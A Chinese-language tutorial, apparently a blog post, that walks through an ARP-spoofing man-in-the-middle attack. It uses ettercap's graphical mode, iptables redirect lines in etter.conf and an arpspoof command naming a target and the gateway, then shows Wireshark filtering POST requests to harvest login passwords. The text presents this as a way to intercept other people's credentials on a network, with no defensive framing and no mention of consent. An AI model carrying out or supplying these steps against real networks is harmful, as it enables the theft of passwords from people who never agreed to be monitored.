图形界面攻击

命令:

ettercap -G

启动中间人攻击,这里需要注意大小写。

依次点击sniff-unified sniffing 选择我们的无线网卡
QQ截图20190331225838.png

点击host-scan for hosts-host list扫描设备
点击目标主机添加为target1将路由设置为target2
QQ截图20190331230246.png
然后点击mitm -arp psisoning将第一个勾选
QQ截图20190331230504.png
然后点击start
当设备有密码登录时,我们就可以拦截到对方输入的密码。
QQ截图20190331223140.png
当然,我们也可以用wireshark分析post来获取密码
当我们抓到握手包后,在协议中搜索http.request.method == "POST"

QQ截图20190331231157.png
其他一些相应的信息
QQ截图20190331231608.png

命令界面

一:先编辑配置文件

vim/etc/ettercap/etter.conf

去掉前面的#号

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

QQ截图20190331232250.png

二:开启ARP欺骗

arpspoof -t 目标 网关 -i 设备

QQ截图20190331232821.png

截取的密码
QQ截图20190331232821.png
当然这期教程之前在公众号发布过视频教程

最后修改:2023 年 08 月 04 日
如果觉得我的文章对你有用,请随意赞赏